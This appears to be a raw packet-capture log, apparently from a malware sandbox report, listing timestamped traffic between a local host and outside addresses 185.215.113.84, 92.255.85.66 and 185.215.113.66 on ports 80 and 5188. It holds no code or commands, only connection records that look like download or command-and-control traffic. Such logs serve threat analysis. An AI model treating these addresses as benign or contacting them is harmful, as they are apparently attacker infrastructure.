Dec 5, 2024 17:32:13.769491911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.769505024 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.769530058 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.769551039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.772427082 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.772479057 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.772620916 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.772658110 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.775372982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.775420904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.775530100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.775568962 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.778409958 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.778472900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.778631926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.778671026 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.781301022 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.781347036 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.781513929 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.781557083 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.784111977 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.784207106 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.784250975 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.787370920 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.787460089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.787508965 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.789773941 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.789787054 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.789825916 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.792306900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.792638063 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.792680025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.795053959 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.795160055 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.795203924 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.797733068 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.798118114 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.798126936 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.798156977 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.800477982 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.800528049 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.800568104 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.800600052 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.803214073 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.803260088 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.803294897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.803328037 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.805974960 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.806090117 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.806138039 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.808696032 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.808758020 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.808871031 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.808914900 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.811481953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.811721087 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.811775923 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.814104080 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.814691067 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.814754009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.816857100 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.816910028 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.816940069 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.816972971 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.819586039 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.819809914 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.819860935 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.822432995 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.822927952 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.822979927 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.824433088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.824479103 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.824680090 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.824728012 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.826550007 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.826565981 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.826606989 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.828661919 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.828708887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.828877926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.828924894 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.830773115 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.831228018 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.831283092 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.832845926 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.832900047 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.833185911 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.833230972 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.835161924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.835309029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.835366011 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.837112904 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.837167025 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.837235928 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.837274075 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.839185953 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.839330912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.839382887 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.841428041 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.841489077 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.841860056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.843447924 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.843503952 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.843544006 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.843579054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.845556021 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.845607996 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.845683098 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.845717907 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.847652912 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.847703934 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.847821951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.847862959 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.849709034 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.849757910 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.850121021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.850198984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.850260019 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.850575924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.850835085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.850877047 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.850917101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.852004051 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.852057934 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.852122068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.853168011 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.853256941 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.853534937 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.854309082 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.854322910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.854451895 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.855493069 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.855554104 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.855637074 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.856542110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.856575966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.856673002 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.857678890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.857738018 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.857795000 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.858807087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.858953953 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.859302044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.860100985 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.860146999 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.860191107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.861099958 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.861190081 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.861475945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.862231970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.862499952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.862519979 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.863455057 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.863523960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.863619089 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.864484072 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.865675926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.865691900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.865704060 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.865741968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.865741968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.866782904 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.867047071 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.867378950 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.868010998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.868052959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.868128061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.869180918 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.869270086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.869297028 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.870227098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.870379925 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.870698929 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.871454954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.871625900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.871675968 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.872471094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.872550011 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.872632027 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.873647928 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.873728991 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.873755932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.874721050 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.874816895 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.875094891 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.875897884 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.876024008 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.876112938 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.876995087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.877027035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.877057076 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.878180027 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.878295898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.878341913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.879345894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.879628897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.879709959 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.880429983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.880481958 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.881179094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.881598949 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.881638050 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.881642103 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.883086920 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.883207083 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.883528948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.884124041 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.884170055 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.884213924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.885004997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.885107040 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.885221004 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.886169910 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.886337996 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.886395931 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.887290955 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.887363911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.887492895 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.888523102 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.888979912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.889050007 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.889589071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.889647961 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.889784098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.890758038 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.890902042 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.890913963 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.891804934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.891902924 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.891988039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.892987013 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.893104076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.893229008 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.894118071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.894520998 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.894577980 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.895204067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.895322084 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.895541906 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.896348000 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.896399021 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.896739006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.897471905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.897524118 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.897660971 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.898646116 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.898844004 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.899036884 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.899748087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.899801970 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.899808884 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.900904894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.900948048 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.900953054 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.902100086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.902198076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.902244091 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.903309107 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.903350115 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.903402090 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.904309034 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.904364109 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.904568911 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.905471087 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.905519009 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.905582905 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.906627893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.906740904 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.906764984 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.907742023 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.907793045 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.908025980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.908869028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.908932924 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.909127951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.955570936 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.957730055 CET	49800	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.960712910 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.960779905 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.960859060 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.961571932 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.961627007 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.961675882 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.961739063 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.963643074 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.963785887 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.963840961 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.965245962 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.965298891 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.965424061 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.965465069 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.966835976 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.967341900 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.967391014 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.968458891 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.968502045 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.968602896 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.968640089 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.970117092 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.970431089 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.970473051 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.971801043 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.971843958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.971997023 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.972170115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.973382950 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.973433018 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.973901033 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.974971056 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.975023031 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.975121975 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.975161076 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.976641893 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.976690054 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.976715088 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.976747990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.978223085 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.978327036 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.978374958 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.979824066 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.979871035 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.980036974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.980073929 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.981626987 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.981678009 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.981754065 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.983062029 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.983078003 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.983109951 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.983136892 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.984649897 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.985018969 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.985069990 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.986269951 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.986372948 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:13.986426115 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:13.988159895 CET	80	49793	185.215.113.84	192.168.2.11
